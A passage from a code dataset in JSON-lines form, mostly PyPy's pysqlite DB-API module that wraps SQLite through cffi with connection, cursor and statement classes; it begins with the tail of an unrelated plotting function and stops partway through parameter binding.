fontsize=kwargs['fz_labels'])\n # bottom legend\n plt.legend(loc='center', bbox_to_anchor=(.5, -.5),\n fontsize='x-large', ncol=2)\n ax_2 = plt.gca()\n\n return [ax_1, ax_2]\n"} {"ext": "py", "sha": "1a3088ec59399e2626ed70fead5607cac892a29c", "content": "#-*- coding: utf-8 -*-\n# pysqlite2/dbapi.py: pysqlite DB-API module\n#\n# Copyright (C) 2007-2008 Gerhard Häring \n#\n# This file is part of pysqlite.\n#\n# This software is provided 'as-is', without any express or implied\n# warranty. In no event will the authors be held liable for any damages\n# arising from the use of this software.\n#\n# Permission is granted to anyone to use this software for any purpose,\n# including commercial applications, and to alter it and redistribute it\n# freely, subject to the following restrictions:\n#\n# 1. The origin of this software must not be misrepresented; you must not\n# claim that you wrote the original software. If you use this software\n# in a product, an acknowledgment in the product documentation would be\n# appreciated but is not required.\n# 2. Altered source versions must be plainly marked as such, and must not be\n# misrepresented as being the original software.\n# 3. This notice may not be removed or altered from any source distribution.\n#\n# Note: This software has been modified for use in PyPy.\n\nfrom collections import OrderedDict\nfrom functools import wraps\nimport datetime\nimport string\nimport sys\nimport weakref\nfrom threading import _get_ident as _thread_get_ident\ntry:\n from __pypy__ import newlist_hint\nexcept ImportError:\n assert '__pypy__' not in sys.builtin_module_names\n newlist_hint = lambda sizehint: []\n\nif sys.version_info[0] >= 3:\n StandardError = Exception\n cmp = lambda x, y: (x > y) - (x < y)\n long = int\n xrange = range\n basestring = unicode = str\n buffer = memoryview\n _BLOB_TYPE = bytes\nelse:\n _BLOB_TYPE = buffer\n\nfrom _sqlite3_cffi import ffi as _ffi, lib as _lib\n\nexported_sqlite_symbols = [\n 'SQLITE_ALTER_TABLE',\n 'SQLITE_ANALYZE',\n 'SQLITE_ATTACH',\n 'SQLITE_CREATE_INDEX',\n 'SQLITE_CREATE_TABLE',\n 'SQLITE_CREATE_TEMP_INDEX',\n 'SQLITE_CREATE_TEMP_TABLE',\n 'SQLITE_CREATE_TEMP_TRIGGER',\n 'SQLITE_CREATE_TEMP_VIEW',\n 'SQLITE_CREATE_TRIGGER',\n 'SQLITE_CREATE_VIEW',\n 'SQLITE_DELETE',\n 'SQLITE_DENY',\n 'SQLITE_DETACH',\n 'SQLITE_DROP_INDEX',\n 'SQLITE_DROP_TABLE',\n 'SQLITE_DROP_TEMP_INDEX',\n 'SQLITE_DROP_TEMP_TABLE',\n 'SQLITE_DROP_TEMP_TRIGGER',\n 'SQLITE_DROP_TEMP_VIEW',\n 'SQLITE_DROP_TRIGGER',\n 'SQLITE_DROP_VIEW',\n 'SQLITE_IGNORE',\n 'SQLITE_INSERT',\n 'SQLITE_OK',\n 'SQLITE_PRAGMA',\n 'SQLITE_READ',\n 'SQLITE_REINDEX',\n 'SQLITE_SELECT',\n 'SQLITE_TRANSACTION',\n 'SQLITE_UPDATE',\n]\n\nfor symbol in exported_sqlite_symbols:\n globals()[symbol] = getattr(_lib, symbol)\n\n_SQLITE_TRANSIENT = _lib.SQLITE_TRANSIENT\n\n# pysqlite version information\nversion = \"2.6.0\"\n\n# pysqlite constants\nPARSE_COLNAMES = 1\nPARSE_DECLTYPES = 2\n\n# SQLite version information\nsqlite_version = str(_ffi.string(_lib.sqlite3_libversion()).decode('ascii'))\n\n_STMT_TYPE_UPDATE = 0\n_STMT_TYPE_DELETE = 1\n_STMT_TYPE_INSERT = 2\n_STMT_TYPE_REPLACE = 3\n_STMT_TYPE_OTHER = 4\n_STMT_TYPE_SELECT = 5\n_STMT_TYPE_INVALID = 6\n\n\nclass Error(StandardError):\n pass\n\n\nclass Warning(StandardError):\n pass\n\n\nclass InterfaceError(Error):\n pass\n\n\nclass DatabaseError(Error):\n pass\n\n\nclass InternalError(DatabaseError):\n pass\n\n\nclass OperationalError(DatabaseError):\n pass\n\n\nclass ProgrammingError(DatabaseError):\n pass\n\n\nclass IntegrityError(DatabaseError):\n pass\n\n\nclass DataError(DatabaseError):\n pass\n\n\nclass NotSupportedError(DatabaseError):\n pass\n\n\ndef connect(database, timeout=5.0, detect_types=0, isolation_level=\"\",\n check_same_thread=True, factory=None, cached_statements=100):\n factory = Connection if not factory else factory\n return factory(database, timeout, detect_types, isolation_level,\n check_same_thread, factory, cached_statements)\n\n\ndef _unicode_text_factory(x):\n return unicode(x, 'utf-8')\n\nif sys.version_info[0] < 3:\n def OptimizedUnicode(s):\n try:\n val = unicode(s, \"ascii\").encode(\"ascii\")\n except UnicodeDecodeError:\n val = unicode(s, \"utf-8\")\n return val\nelse:\n OptimizedUnicode = _unicode_text_factory\n\n\nclass _StatementCache(object):\n def __init__(self, connection, maxcount):\n self.connection = connection\n self.maxcount = maxcount\n self.cache = OrderedDict()\n\n def get(self, sql):\n try:\n stat = self.cache[sql]\n except KeyError:\n stat = Statement(self.connection, sql)\n self.cache[sql] = stat\n if len(self.cache) > self.maxcount:\n self.cache.popitem(0)\n else:\n if stat._in_use:\n stat = Statement(self.connection, sql)\n self.cache[sql] = stat\n return stat\n\n\nclass Connection(object):\n __initialized = False\n _db = None\n\n def __init__(self, database, timeout=5.0, detect_types=0, isolation_level=\"\",\n check_same_thread=True, factory=None, cached_statements=100):\n self.__initialized = True\n db_star = _ffi.new('sqlite3 **')\n\n if isinstance(database, unicode):\n database = database.encode('utf-8')\n if _lib.sqlite3_open(database, db_star) != _lib.SQLITE_OK:\n raise OperationalError(\"Could not open database\")\n self._db = db_star[0]\n if timeout is not None:\n timeout = int(timeout * 1000) # pysqlite2 uses timeout in seconds\n _lib.sqlite3_busy_timeout(self._db, timeout)\n\n self.row_factory = None\n self.text_factory = _unicode_text_factory\n\n self._detect_types = detect_types\n self._in_transaction = False\n self.isolation_level = isolation_level\n\n self.__cursors = []\n self.__cursors_counter = 0\n self.__statements = []\n self.__statements_counter = 0\n self.__rawstatements = set()\n self._statement_cache = _StatementCache(self, cached_statements)\n\n self.__func_cache = {}\n self.__aggregates = {}\n self.__aggregate_instances = {}\n self.__collations = {}\n if check_same_thread:\n self.__thread_ident = _thread_get_ident()\n\n self.Error = Error\n self.Warning = Warning\n self.InterfaceError = InterfaceError\n self.DatabaseError = DatabaseError\n self.InternalError = InternalError\n self.OperationalError = OperationalError\n self.ProgrammingError = ProgrammingError\n self.IntegrityError = IntegrityError\n self.DataError = DataError\n self.NotSupportedError = NotSupportedError\n\n def __del__(self):\n if self._db:\n _lib.sqlite3_close(self._db)\n\n def close(self):\n self._check_thread()\n\n self.__do_all_statements(Statement._finalize, True)\n\n # depending on when this close() is called, the statements' weakrefs\n # may be already dead, even though Statement.__del__() was not called\n # yet. In this case, self.__rawstatements is not empty.\n if self.__rawstatements is not None:\n for stmt in list(self.__rawstatements):\n self._finalize_raw_statement(stmt)\n self.__rawstatements = None\n\n if self._db:\n ret = _lib.sqlite3_close(self._db)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n self._db = None\n\n def _check_closed(self):\n if not self.__initialized:\n raise ProgrammingError(\"Base Connection.__init__ not called.\")\n if not self._db:\n raise ProgrammingError(\"Cannot operate on a closed database.\")\n\n def _check_closed_wrap(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n self._check_closed()\n return func(self, *args, **kwargs)\n return wrapper\n\n def _check_thread(self):\n try:\n if self.__thread_ident == _thread_get_ident():\n return\n except AttributeError:\n pass\n else:\n raise ProgrammingError(\n \"SQLite objects created in a thread can only be used in that \"\n \"same thread. The object was created in thread id %d and this \"\n \"is thread id %d\" % (self.__thread_ident, _thread_get_ident()))\n\n def _check_thread_wrap(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n self._check_thread()\n return func(self, *args, **kwargs)\n return wrapper\n\n def _get_exception(self, error_code=None):\n if error_code is None:\n error_code = _lib.sqlite3_errcode(self._db)\n error_message = _ffi.string(_lib.sqlite3_errmsg(self._db)).decode('utf-8')\n\n if error_code == _lib.SQLITE_OK:\n raise ValueError(\"error signalled but got SQLITE_OK\")\n elif error_code in (_lib.SQLITE_INTERNAL, _lib.SQLITE_NOTFOUND):\n exc = InternalError\n elif error_code == _lib.SQLITE_NOMEM:\n exc = MemoryError\n elif error_code in (\n _lib.SQLITE_ERROR, _lib.SQLITE_PERM, _lib.SQLITE_ABORT,\n _lib.SQLITE_BUSY, _lib.SQLITE_LOCKED, _lib.SQLITE_READONLY,\n _lib.SQLITE_INTERRUPT, _lib.SQLITE_IOERR, _lib.SQLITE_FULL,\n _lib.SQLITE_CANTOPEN, _lib.SQLITE_PROTOCOL, _lib.SQLITE_EMPTY,\n _lib.SQLITE_SCHEMA):\n exc = OperationalError\n elif error_code == _lib.SQLITE_CORRUPT:\n exc = DatabaseError\n elif error_code == _lib.SQLITE_TOOBIG:\n exc = DataError\n elif error_code in (_lib.SQLITE_CONSTRAINT, _lib.SQLITE_MISMATCH):\n exc = IntegrityError\n elif error_code == _lib.SQLITE_MISUSE:\n exc = ProgrammingError\n else:\n exc = DatabaseError\n exc = exc(error_message)\n exc.error_code = error_code\n return exc\n\n def _remember_cursor(self, cursor):\n self.__cursors.append(weakref.ref(cursor))\n self.__cursors_counter += 1\n if self.__cursors_counter < 200:\n return\n self.__cursors_counter = 0\n self.__cursors = [r for r in self.__cursors if r() is not None]\n\n def _remember_statement(self, statement):\n self.__rawstatements.add(statement._statement)\n self.__statements.append(weakref.ref(statement))\n self.__statements_counter += 1\n if self.__statements_counter < 200:\n return\n self.__statements_counter = 0\n self.__statements = [r for r in self.__statements if r() is not None]\n\n def _finalize_raw_statement(self, _statement):\n if self.__rawstatements is not None:\n try:\n self.__rawstatements.remove(_statement)\n except KeyError:\n return # rare case: already finalized, see issue #2097\n _lib.sqlite3_finalize(_statement)\n\n def __do_all_statements(self, action, reset_cursors):\n for weakref in self.__statements:\n statement = weakref()\n if statement is not None:\n action(statement)\n\n if reset_cursors:\n for weakref in self.__cursors:\n cursor = weakref()\n if cursor is not None:\n cursor._reset = True\n\n @_check_thread_wrap\n @_check_closed_wrap\n def __call__(self, sql):\n return self._statement_cache.get(sql)\n\n def cursor(self, factory=None):\n self._check_thread()\n self._check_closed()\n if factory is None:\n factory = Cursor\n cur = factory(self)\n if self.row_factory is not None:\n cur.row_factory = self.row_factory\n return cur\n\n def execute(self, *args):\n cur = self.cursor()\n return cur.execute(*args)\n\n def executemany(self, *args):\n cur = self.cursor()\n return cur.executemany(*args)\n\n def executescript(self, *args):\n cur = self.cursor()\n return cur.executescript(*args)\n\n def iterdump(self):\n from sqlite3.dump import _iterdump\n return _iterdump(self)\n\n def _begin(self):\n statement_star = _ffi.new('sqlite3_stmt **')\n ret = _lib.sqlite3_prepare_v2(self._db, self.__begin_statement, -1,\n statement_star, _ffi.NULL)\n try:\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n ret = _lib.sqlite3_step(statement_star[0])\n if ret != _lib.SQLITE_DONE:\n raise self._get_exception(ret)\n self._in_transaction = True\n finally:\n _lib.sqlite3_finalize(statement_star[0])\n\n def commit(self):\n self._check_thread()\n self._check_closed()\n if not self._in_transaction:\n return\n\n self.__do_all_statements(Statement._reset, False)\n\n statement_star = _ffi.new('sqlite3_stmt **')\n ret = _lib.sqlite3_prepare_v2(self._db, b\"COMMIT\", -1,\n statement_star, _ffi.NULL)\n try:\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n ret = _lib.sqlite3_step(statement_star[0])\n if ret != _lib.SQLITE_DONE:\n raise self._get_exception(ret)\n self._in_transaction = False\n finally:\n _lib.sqlite3_finalize(statement_star[0])\n\n def rollback(self):\n self._check_thread()\n self._check_closed()\n if not self._in_transaction:\n return\n\n self.__do_all_statements(Statement._reset, True)\n\n statement_star = _ffi.new('sqlite3_stmt **')\n ret = _lib.sqlite3_prepare_v2(self._db, b\"ROLLBACK\", -1,\n statement_star, _ffi.NULL)\n try:\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n ret = _lib.sqlite3_step(statement_star[0])\n if ret != _lib.SQLITE_DONE:\n raise self._get_exception(ret)\n self._in_transaction = False\n finally:\n _lib.sqlite3_finalize(statement_star[0])\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, exc_tb):\n if exc_type is None and exc_value is None and exc_tb is None:\n self.commit()\n else:\n self.rollback()\n\n @_check_thread_wrap\n @_check_closed_wrap\n def create_function(self, name, num_args, callback):\n try:\n closure = self.__func_cache[callback]\n except KeyError:\n @_ffi.callback(\"void(sqlite3_context*, int, sqlite3_value**)\")\n def closure(context, nargs, c_params):\n _function_callback(callback, context, nargs, c_params)\n self.__func_cache[callback] = closure\n\n if isinstance(name, unicode):\n name = name.encode('utf-8')\n ret = _lib.sqlite3_create_function(self._db, name, num_args,\n _lib.SQLITE_UTF8, _ffi.NULL,\n closure, _ffi.NULL, _ffi.NULL)\n if ret != _lib.SQLITE_OK:\n raise self.OperationalError(\"Error creating function\")\n\n @_check_thread_wrap\n @_check_closed_wrap\n def create_aggregate(self, name, num_args, cls):\n try:\n step_callback, final_callback = self.__aggregates[cls]\n except KeyError:\n @_ffi.callback(\"void(sqlite3_context*, int, sqlite3_value**)\")\n def step_callback(context, argc, c_params):\n res = _lib.sqlite3_aggregate_context(context,\n _ffi.sizeof(\"size_t\"))\n aggregate_ptr = _ffi.cast(\"size_t[1]\", res)\n\n if not aggregate_ptr[0]:\n try:\n aggregate = cls()\n except Exception:\n msg = (b\"user-defined aggregate's '__init__' \"\n b\"method raised error\")\n _lib.sqlite3_result_error(context, msg, len(msg))\n return\n aggregate_id = id(aggregate)\n self.__aggregate_instances[aggregate_id] = aggregate\n aggregate_ptr[0] = aggregate_id\n else:\n aggregate = self.__aggregate_instances[aggregate_ptr[0]]\n\n params = _convert_params(context, argc, c_params)\n try:\n aggregate.step(*params)\n except Exception:\n msg = (b\"user-defined aggregate's 'step' \"\n b\"method raised error\")\n _lib.sqlite3_result_error(context, msg, len(msg))\n\n @_ffi.callback(\"void(sqlite3_context*)\")\n def final_callback(context):\n res = _lib.sqlite3_aggregate_context(context,\n _ffi.sizeof(\"size_t\"))\n aggregate_ptr = _ffi.cast(\"size_t[1]\", res)\n\n if aggregate_ptr[0]:\n aggregate = self.__aggregate_instances[aggregate_ptr[0]]\n try:\n val = aggregate.finalize()\n except Exception:\n msg = (b\"user-defined aggregate's 'finalize' \"\n b\"method raised error\")\n _lib.sqlite3_result_error(context, msg, len(msg))\n else:\n _convert_result(context, val)\n finally:\n del self.__aggregate_instances[aggregate_ptr[0]]\n\n self.__aggregates[cls] = (step_callback, final_callback)\n\n if isinstance(name, unicode):\n name = name.encode('utf-8')\n ret = _lib.sqlite3_create_function(self._db, name, num_args,\n _lib.SQLITE_UTF8, _ffi.NULL,\n _ffi.NULL,\n step_callback,\n final_callback)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n\n @_check_thread_wrap\n @_check_closed_wrap\n def create_collation(self, name, callback):\n name = name.upper()\n if not all(c in string.ascii_uppercase + string.digits + '_' for c in name):\n raise ProgrammingError(\"invalid character in collation name\")\n\n if callback is None:\n del self.__collations[name]\n collation_callback = _ffi.NULL\n else:\n if not callable(callback):\n raise TypeError(\"parameter must be callable\")\n\n @_ffi.callback(\"int(void*, int, const void*, int, const void*)\")\n def collation_callback(context, len1, str1, len2, str2):\n text1 = _ffi.buffer(str1, len1)[:]\n text2 = _ffi.buffer(str2, len2)[:]\n try:\n ret = callback(text1, text2)\n assert isinstance(ret, (int, long))\n return cmp(ret, 0)\n except Exception:\n return 0\n\n self.__collations[name] = collation_callback\n\n if isinstance(name, unicode):\n name = name.encode('utf-8')\n ret = _lib.sqlite3_create_collation(self._db, name,\n _lib.SQLITE_UTF8,\n _ffi.NULL,\n collation_callback)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n\n @_check_thread_wrap\n @_check_closed_wrap\n def set_authorizer(self, callback):\n try:\n authorizer = self.__func_cache[callback]\n except KeyError:\n @_ffi.callback(\"int(void*, int, const char*, const char*, \"\n \"const char*, const char*)\")\n def authorizer(userdata, action, arg1, arg2, dbname, source):\n try:\n ret = callback(action, arg1, arg2, dbname, source)\n assert isinstance(ret, int)\n # try to detect cases in which cffi would swallow\n # OverflowError when casting the return value\n assert int(_ffi.cast('int', ret)) == ret\n return ret\n except Exception:\n return _lib.SQLITE_DENY\n self.__func_cache[callback] = authorizer\n\n ret = _lib.sqlite3_set_authorizer(self._db, authorizer, _ffi.NULL)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n\n @_check_thread_wrap\n @_check_closed_wrap\n def set_progress_handler(self, callable, nsteps):\n if callable is None:\n progress_handler = _ffi.NULL\n else:\n try:\n progress_handler = self.__func_cache[callable]\n except KeyError:\n @_ffi.callback(\"int(void*)\")\n def progress_handler(userdata):\n try:\n return bool(callable())\n except Exception:\n # abort query if error occurred\n return 1\n self.__func_cache[callable] = progress_handler\n _lib.sqlite3_progress_handler(self._db, nsteps, progress_handler,\n _ffi.NULL)\n\n if sys.version_info[0] >= 3:\n def __get_in_transaction(self):\n return self._in_transaction\n in_transaction = property(__get_in_transaction)\n\n def __get_total_changes(self):\n self._check_closed()\n return _lib.sqlite3_total_changes(self._db)\n total_changes = property(__get_total_changes)\n\n def __get_isolation_level(self):\n return self._isolation_level\n\n def __set_isolation_level(self, val):\n if val is None:\n self.commit()\n else:\n self.__begin_statement = str(\"BEGIN \" + val).encode('utf-8')\n self._isolation_level = val\n isolation_level = property(__get_isolation_level, __set_isolation_level)\n\n if hasattr(_lib, 'sqlite3_enable_load_extension'):\n @_check_thread_wrap\n @_check_closed_wrap\n def enable_load_extension(self, enabled):\n rc = _lib.sqlite3_enable_load_extension(self._db, int(enabled))\n if rc != _lib.SQLITE_OK:\n raise OperationalError(\"Error enabling load extension\")\n\n\nclass Cursor(object):\n __initialized = False\n __statement = None\n\n def __init__(self, con):\n if not isinstance(con, Connection):\n raise TypeError\n self.__connection = con\n\n self.arraysize = 1\n self.row_factory = None\n self._reset = False\n self.__locked = False\n self.__closed = False\n self.__lastrowid = None\n self.__rowcount = -1\n\n con._check_thread()\n con._remember_cursor(self)\n\n self.__initialized = True\n\n def close(self):\n self.__connection._check_thread()\n self.__connection._check_closed()\n if self.__statement:\n self.__statement._reset()\n self.__statement = None\n self.__closed = True\n\n def __check_cursor(self):\n if not self.__initialized:\n raise ProgrammingError(\"Base Cursor.__init__ not called.\")\n if self.__closed:\n raise ProgrammingError(\"Cannot operate on a closed cursor.\")\n if self.__locked:\n raise ProgrammingError(\"Recursive use of cursors not allowed.\")\n self.__connection._check_thread()\n self.__connection._check_closed()\n\n def __check_cursor_wrap(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n self.__check_cursor()\n return func(self, *args, **kwargs)\n return wrapper\n\n def __check_reset(self):\n if self._reset:\n raise InterfaceError(\n \"Cursor needed to be reset because of commit/rollback \"\n \"and can no longer be fetched from.\")\n\n def __build_row_cast_map(self):\n if not self.__connection._detect_types:\n return\n self.__row_cast_map = []\n for i in xrange(_lib.sqlite3_column_count(self.__statement._statement)):\n converter = None\n\n if self.__connection._detect_types & PARSE_COLNAMES:\n colname = _lib.sqlite3_column_name(self.__statement._statement, i)\n if colname:\n colname = _ffi.string(colname).decode('utf-8')\n type_start = -1\n key = None\n for pos in range(len(colname)):\n if colname[pos] == '[':\n type_start = pos + 1\n elif colname[pos] == ']' and type_start != -1:\n key = colname[type_start:pos]\n converter = converters[key.upper()]\n\n if converter is None and self.__connection._detect_types & PARSE_DECLTYPES:\n decltype = _lib.sqlite3_column_decltype(self.__statement._statement, i)\n if decltype:\n decltype = _ffi.string(decltype).decode('utf-8')\n # if multiple words, use first, eg.\n # \"INTEGER NOT NULL\" => \"INTEGER\"\n decltype = decltype.split()[0]\n if '(' in decltype:\n decltype = decltype[:decltype.index('(')]\n converter = converters.get(decltype.upper(), None)\n\n self.__row_cast_map.append(converter)\n\n def __fetch_one_row(self):\n num_cols = _lib.sqlite3_data_count(self.__statement._statement)\n row = newlist_hint(num_cols)\n for i in xrange(num_cols):\n if self.__connection._detect_types:\n converter = self.__row_cast_map[i]\n else:\n converter = None\n\n if converter is not None:\n blob = _lib.sqlite3_column_blob(self.__statement._statement, i)\n if not blob:\n val = None\n else:\n blob_len = _lib.sqlite3_column_bytes(self.__statement._statement, i)\n val = _ffi.buffer(blob, blob_len)[:]\n val = converter(val)\n else:\n typ = _lib.sqlite3_column_type(self.__statement._statement, i)\n if typ == _lib.SQLITE_NULL:\n val = None\n elif typ == _lib.SQLITE_INTEGER:\n val = _lib.sqlite3_column_int64(self.__statement._statement, i)\n val = int(val)\n elif typ == _lib.SQLITE_FLOAT:\n val = _lib.sqlite3_column_double(self.__statement._statement, i)\n elif typ == _lib.SQLITE_TEXT:\n text = _lib.sqlite3_column_text(self.__statement._statement, i)\n text_len = _lib.sqlite3_column_bytes(self.__statement._statement, i)\n val = _ffi.buffer(text, text_len)[:]\n try:\n val = self.__connection.text_factory(val)\n except Exception:\n column_name = _lib.sqlite3_column_name(\n self.__statement._statement, i)\n if column_name:\n column_name = _ffi.string(column_name).decode('utf-8')\n else:\n column_name = \"\"\n val = val.decode('ascii', 'replace')\n raise OperationalError(\n \"Could not decode to UTF-8 column '%s' with text '%s'\" % (\n column_name, val))\n elif typ == _lib.SQLITE_BLOB:\n blob = _lib.sqlite3_column_blob(self.__statement._statement, i)\n blob_len = _lib.sqlite3_column_bytes(self.__statement._statement, i)\n val = _BLOB_TYPE(_ffi.buffer(blob, blob_len)[:])\n row.append(val)\n return tuple(row)\n\n def __execute(self, multiple, sql, many_params):\n self.__locked = True\n self._reset = False\n try:\n del self.__next_row\n except AttributeError:\n pass\n try:\n if not isinstance(sql, basestring):\n raise ValueError(\"operation parameter must be str or unicode\")\n try:\n del self.__description\n except AttributeError:\n pass\n self.__rowcount = -1\n self.__statement = self.__connection._statement_cache.get(sql)\n\n if self.__connection._isolation_level is not None:\n if self.__statement._type in (\n _STMT_TYPE_UPDATE,\n _STMT_TYPE_DELETE,\n _STMT_TYPE_INSERT,\n _STMT_TYPE_REPLACE\n ):\n if not self.__connection._in_transaction:\n self.__connection._begin()\n elif self.__statement._type == _STMT_TYPE_OTHER:\n if self.__connection._in_transaction:\n self.__connection.commit()\n elif self.__statement._type == _STMT_TYPE_SELECT:\n if multiple:\n raise ProgrammingError(\"You cannot execute SELECT \"\n \"statements in executemany().\")\n\n for params in many_params:\n self.__statement._set_params(params)\n\n # Actually execute the SQL statement\n ret = _lib.sqlite3_step(self.__statement._statement)\n\n if ret == _lib.SQLITE_ROW:\n if multiple:\n raise ProgrammingError(\"executemany() can only execute DML statements.\")\n self.__build_row_cast_map()\n self.__next_row = self.__fetch_one_row()\n elif ret == _lib.SQLITE_DONE:\n if not multiple:\n self.__statement._reset()\n else:\n self.__statement._reset()\n raise self.__connection._get_exception(ret)\n\n if self.__statement._type in (\n _STMT_TYPE_UPDATE,\n _STMT_TYPE_DELETE,\n _STMT_TYPE_INSERT,\n _STMT_TYPE_REPLACE\n ):\n if self.__rowcount == -1:\n self.__rowcount = 0\n self.__rowcount += _lib.sqlite3_changes(self.__connection._db)\n\n if not multiple and self.__statement._type == _STMT_TYPE_INSERT:\n self.__lastrowid = _lib.sqlite3_last_insert_rowid(self.__connection._db)\n else:\n self.__lastrowid = None\n\n if multiple:\n self.__statement._reset()\n finally:\n self.__connection._in_transaction = \\\n not _lib.sqlite3_get_autocommit(self.__connection._db)\n self.__locked = False\n return self\n\n @__check_cursor_wrap\n def execute(self, sql, params=[]):\n return self.__execute(False, sql, [params])\n\n @__check_cursor_wrap\n def executemany(self, sql, many_params):\n return self.__execute(True, sql, many_params)\n\n def executescript(self, sql):\n self.__check_cursor()\n self._reset = False\n if isinstance(sql, unicode):\n sql = sql.encode('utf-8')\n elif not isinstance(sql, str):\n raise ValueError(\"script argument must be unicode or string.\")\n statement_star = _ffi.new('sqlite3_stmt **')\n next_char = _ffi.new('char **')\n\n self.__connection.commit()\n while True:\n c_sql = _ffi.new(\"char[]\", sql)\n rc = _lib.sqlite3_prepare(self.__connection._db, c_sql, -1,\n statement_star, next_char)\n if rc != _lib.SQLITE_OK:\n raise self.__connection._get_exception(rc)\n\n rc = _lib.SQLITE_ROW\n while rc == _lib.SQLITE_ROW:\n if not statement_star[0]:\n rc = _lib.SQLITE_OK\n else:\n rc = _lib.sqlite3_step(statement_star[0])\n\n if rc != _lib.SQLITE_DONE:\n _lib.sqlite3_finalize(statement_star[0])\n if rc == _lib.SQLITE_OK:\n break\n else:\n raise self.__connection._get_exception(rc)\n\n rc = _lib.sqlite3_finalize(statement_star[0])\n if rc != _lib.SQLITE_OK:\n raise self.__connection._get_exception(rc)\n\n sql = _ffi.string(next_char[0])\n if not sql:\n break\n return self\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.__check_cursor()\n self.__check_reset()\n if not self.__statement:\n raise StopIteration\n\n try:\n next_row = self.__next_row\n except AttributeError:\n raise StopIteration\n del self.__next_row\n\n if self.row_factory is not None:\n next_row = self.row_factory(self, next_row)\n\n ret = _lib.sqlite3_step(self.__statement._statement)\n if ret == _lib.SQLITE_ROW:\n self.__next_row = self.__fetch_one_row()\n else:\n self.__statement._reset()\n if ret != _lib.SQLITE_DONE:\n raise self.__connection._get_exception(ret)\n return next_row\n\n if sys.version_info[0] < 3:\n next = __next__\n del __next__\n\n def fetchone(self):\n return next(self, None)\n\n def fetchmany(self, size=None):\n if size is None:\n size = self.arraysize\n lst = []\n for row in self:\n lst.append(row)\n if len(lst) == size:\n break\n return lst\n\n def fetchall(self):\n return list(self)\n\n def __get_connection(self):\n return self.__connection\n connection = property(__get_connection)\n\n def __get_rowcount(self):\n return self.__rowcount\n rowcount = property(__get_rowcount)\n\n def __get_description(self):\n try:\n return self.__description\n except AttributeError:\n if self.__statement:\n self.__description = self.__statement._get_description()\n return self.__description\n description = property(__get_description)\n\n def __get_lastrowid(self):\n return self.__lastrowid\n lastrowid = property(__get_lastrowid)\n\n def setinputsizes(self, *args):\n pass\n\n def setoutputsize(self, *args):\n pass\n\n\nclass Statement(object):\n _statement = None\n\n def __init__(self, connection, sql):\n self.__con = connection\n\n self._in_use = False\n\n if not isinstance(sql, basestring):\n raise Warning(\"SQL is of wrong type. Must be string or unicode.\")\n if '\\0' in sql:\n raise ValueError(\"the query contains a null character\")\n\n first_word = sql.lstrip().split(\" \")[0].upper()\n if first_word == \"\":\n self._type = _STMT_TYPE_INVALID\n elif first_word == \"SELECT\":\n self._type = _STMT_TYPE_SELECT\n elif first_word == \"INSERT\":\n self._type = _STMT_TYPE_INSERT\n elif first_word == \"UPDATE\":\n self._type = _STMT_TYPE_UPDATE\n elif first_word == \"DELETE\":\n self._type = _STMT_TYPE_DELETE\n elif first_word == \"REPLACE\":\n self._type = _STMT_TYPE_REPLACE\n else:\n self._type = _STMT_TYPE_OTHER\n\n if isinstance(sql, unicode):\n sql = sql.encode('utf-8')\n statement_star = _ffi.new('sqlite3_stmt **')\n next_char = _ffi.new('char **')\n c_sql = _ffi.new(\"char[]\", sql)\n ret = _lib.sqlite3_prepare_v2(self.__con._db, c_sql, -1,\n statement_star, next_char)\n self._statement = statement_star[0]\n\n if ret == _lib.SQLITE_OK and not self._statement:\n # an empty statement, work around that, as it's the least trouble\n self._type = _STMT_TYPE_SELECT\n c_sql = _ffi.new(\"char[]\", b\"select 42\")\n ret = _lib.sqlite3_prepare_v2(self.__con._db, c_sql, -1,\n statement_star, next_char)\n self._statement = statement_star[0]\n\n if ret != _lib.SQLITE_OK:\n raise self.__con._get_exception(ret)\n\n self.__con._remember_statement(self)\n\n tail = _ffi.string(next_char[0]).decode('utf-8')\n if _check_remaining_sql(tail):\n raise Warning(\"You can only execute one statement at a time.\")\n\n def __del__(self):\n if self._statement:\n self.__con._finalize_raw_statement(self._statement)\n\n def _finalize(self):\n if self._statement:\n self.__con._finalize_raw_statement(self._statement)\n self._statement = None\n self._in_use = False\n\n def _reset(self):\n if self._in_use and self._statement:\n _lib.sqlite3_reset(self._statement)\n self._in_use = False\n\n if sys.version_info[0] < 3:\n def __check_decodable(self, param):\n if self.__con.text_factory in (unicode, OptimizedUnicode,\n _unicode_text_factory):\n for c in param:\n if ord(c) & 0x80 != 0:\n raise self.__con.ProgrammingError(\n \"You must not use 8-bit bytestrings unless \"\n \"you use a text_factory that can interpret \"\n \"8-bit bytestrings (like text_factory = str). \"\n \"It is highly recommended that you instead \"\n \"just switch your application to Unicode strings.\")\n\n def __set_param(self, idx, param):\n cvt = converters.get(type(param))\n if cvt is not None:\n param = cvt(param)\n\n try:\n param = adapt(param)\n except:\n pass # And use previous value\n\n if param is None:\n rc = _lib.sqlite3_bind_null(self._statement, idx)\n elif isinstance(param, (bool, int, long)):\n if -2147483648 <= param <= 2147483647:\n rc = _lib.sqlite3_bind_int(self._statement, idx, param)\n else:\n rc = _lib.sqlite3_bind_int64(self._statement, idx, param)\n elif isinstance(param, float):\n rc = _lib.sqlite3_bind_double(self._statement, idx, param)\n elif isinstance(param, unicode):\n param = param.encode(\"utf-8\")\n rc = _lib.sqlite3_bind_text(self._statement, idx, param,\n len(param), _SQLITE_TRANSIENT)\n elif isinstance(param, str):\n self.__check_decodable(param)\n rc = _lib.sqlite3_bind_text(self._statement, idx, param,\n len(param), _SQLITE_TRANSIENT)\n elif isinstance(param, (buffer, bytes)):\n param = bytes(param)\n rc = _lib.sqlite3_bind_blob(self._statement, idx, param,\n len(param), _SQLITE_TRANSIENT)\n else:\n rc = -1\n return rc\n\n def _set_params(self, params):\n self._in_use = True\n\n num_params_needed = _lib.sqlite3_bind_parameter_count(self._statement)\n if isinstance(params, (tuple, list)) or \\\n not isinstance(params, dict) and \\\n hasattr(params, '__getitem__'):\n 